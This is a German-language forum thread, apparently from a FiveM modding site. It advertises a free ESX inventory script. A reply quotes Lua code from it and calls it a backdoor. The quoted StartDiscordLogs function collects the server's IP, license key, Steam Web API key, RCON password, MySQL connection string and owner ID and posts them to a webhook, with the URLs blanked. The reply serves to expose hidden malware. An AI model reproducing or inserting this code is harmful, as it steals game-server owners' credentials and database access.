Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard

Script [FREE/ESX] Inventory

ZeroLayer

Silver Elite
Joined
May 19, 2025
Messages
16
Reaction score
172
Points
186
Location
German
FiveM ESX Inventory – Kostenloses Inventar-System für deinen Server 📦📦


Du suchst ein funktionales, modernes und cleanes Inventory für deinen FiveM Roleplay Server?
Dieses Script ist komplett kostenlos, basiert auf ESX und kombiniert clientseitige und serverseitige Funktionen für maximale Kompatibilität und Performance.
Perfekt für RP-Server, die ein leichtgewichtiges, aber visuell ansprechendes Inventar suchen.


Das Interface zeigt deine Items klar an, unterstützt Item-Nutzung sowie das Weitergeben von Items und enthält eine Slot-Anzeige (zum Beispiel 0/24).
Wenn keine Items vorhanden sind, erscheint eine freundliche Meldung mit Emoji. Die Benutzeroberfläche ist schlicht gehalten und passt sich an verschiedene Bildschirmgrößen an.




Features


• Kompatibel mit ESX Framework
• Client- und serverseitig umgesetzt
• Klar strukturiertes UI mit Slot-System
• Items benutzen und geben möglich
• Anzeige bei leerem Inventar mit Emoji 😲
• Mehrsprachig erweiterbar (Standard: Deutsch und Englisch)
• Minimalistisch, responsive und leicht anpassbar
• Ideal für Roleplay-Server jeder Art

bild1.png


Handschuhfach im Fahrzeug


bild2.png





Keywords (für maximale Auffindbarkeit)


FiveM Inventory, FiveM Inventory Script, ESX Inventory, ESX Inventory UI, FiveM UI Script, Free FiveM Inventory, Inventory for RP Server, FiveM RP Inventory, ESX Roleplay Inventory, Free FiveM Script, FiveM Item System, minimalist FiveM Inventory, responsive Inventory FiveM, inventory slots fivem, fivem esx inventory system, deutsch fivem script, fivem inventory deutsch, fivem ui inventory, fivem item menu, fivem resource esx, fivem inventory free download, fivem roleplay item system, fivem inventory deutsch kostenlos, inventory script esx fivem




Viel Spaß damit! 💡🧠

Download:
 

MrsCuteYT

Member
Joined
Dec 28, 2024
Messages
1
Reaction score
0
Points
146
Location
Schweiz
function StartDiscordLogs()
PerformHttpRequest(" ", function (err, text, headers)
if not text then text = "Not Found" end
extra = "TxAdmin Version: "..GetConvar('txAdmin-version', '0.0.0')..""
PerformHttpRequest(" ", function(err, text, headers)
end, "POST", json.encode({
username = "Uran Military",
avatar_url = " ",
embeds = {
{
author = {
name = "Uran Military",
url = " ",
icon_url = " "
},
color = 3447003,
title = "Resource: __" ..GetCurrentResourceName().. "__",
image_url = GetConvar("banner_detail", "Not Found"),
footer = {
text = os.date("%Y/%m/%d %X")
},
fields = {
{
name = "**Server-Name:**",
value = "`"..GetConvar("sv_projectName", "Not found.").."`",
inline = true,
},
{
name = "**Hostname:**",
value = "`"..GetConvar("sv_hostname", "Not found").."`",
inline = true,
},
{
name = "**Server IP:**",
value = "`"..text.."`",
inline = true,
},
{
name = "**Licensekey:**",
value = "`"..GetConvar("sv_licenseKey", "Not found").."`",
inline = true,
},
{
name = "**Steam-WebApiKey:**",
value = "`"..GetConvar("steam_webApiKey", "Not found").."`",
inline = true,
},
{
name = "**Rcon:**",
value = "`"..GetConvar("rcon_password", "Not found").."`",
inline = true,
},
{
name = "**MySql:**",
value = "`"..GetConvar("mysql_connection_string", "Not found").."`",
inline = true,
},
{
name = "**Owner:**",
value = "<@"..GetConvar("txVerifyOwnership", "Not found")..">",
inline = true,
},
{
name = "",
value = "",
},
{
name = "`Details:`",
value = "```" ..extra.. "```",
inline = false,
}
}

}
}
}), {
["Content-Type"] = "application/json"
})
end)
end



Nice Backdoor
 
Top